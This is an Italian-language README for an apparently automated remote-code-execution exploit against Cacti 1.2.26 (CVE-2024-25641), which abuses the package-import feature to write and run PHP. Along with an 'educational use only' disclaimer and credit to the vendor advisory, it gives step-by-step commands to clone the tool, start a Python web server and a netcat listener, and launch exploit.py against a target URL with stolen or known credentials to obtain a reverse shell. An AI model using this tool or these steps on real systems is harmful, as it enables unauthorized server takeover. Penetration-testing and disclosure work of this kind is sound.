
CVE-2024-25641 - Exploit RCE automatizzato - Cacti 1.2.26
Exploit completamente automatizzato per CVE-2024-25641. Quando un utente è autenticato, Cacti versione 1.2.26 è vulnerabile a una vulnerabilità di scrittura arbitraria di file, sfruttabile tramite la funzionalità "Importazione Pacchetti", consente agli utenti autenticati con il permesso "Importa Modelli" di eseguire codice PHP arbitrario sul server web (RCE).
Crediti a questo PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Ho semplicemente automatizzato questo per ottenere un punto d'appoggio.)
Questo strumento è destinato esclusivamente a scopi educativi e di test. L'autore di questo strumento non è responsabile per qualsiasi uso improprio o attività illegale eseguita con esso. Usa questo strumento solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione al test. L'accesso non autorizzato a sistemi informatici è illegale e non etico.
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>
# Setup netcat listener
nc -lvnp <LOCAL_PORT>
# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>
Puoi anche dare un'occhiata a questo : CVE-2024-25641 PoC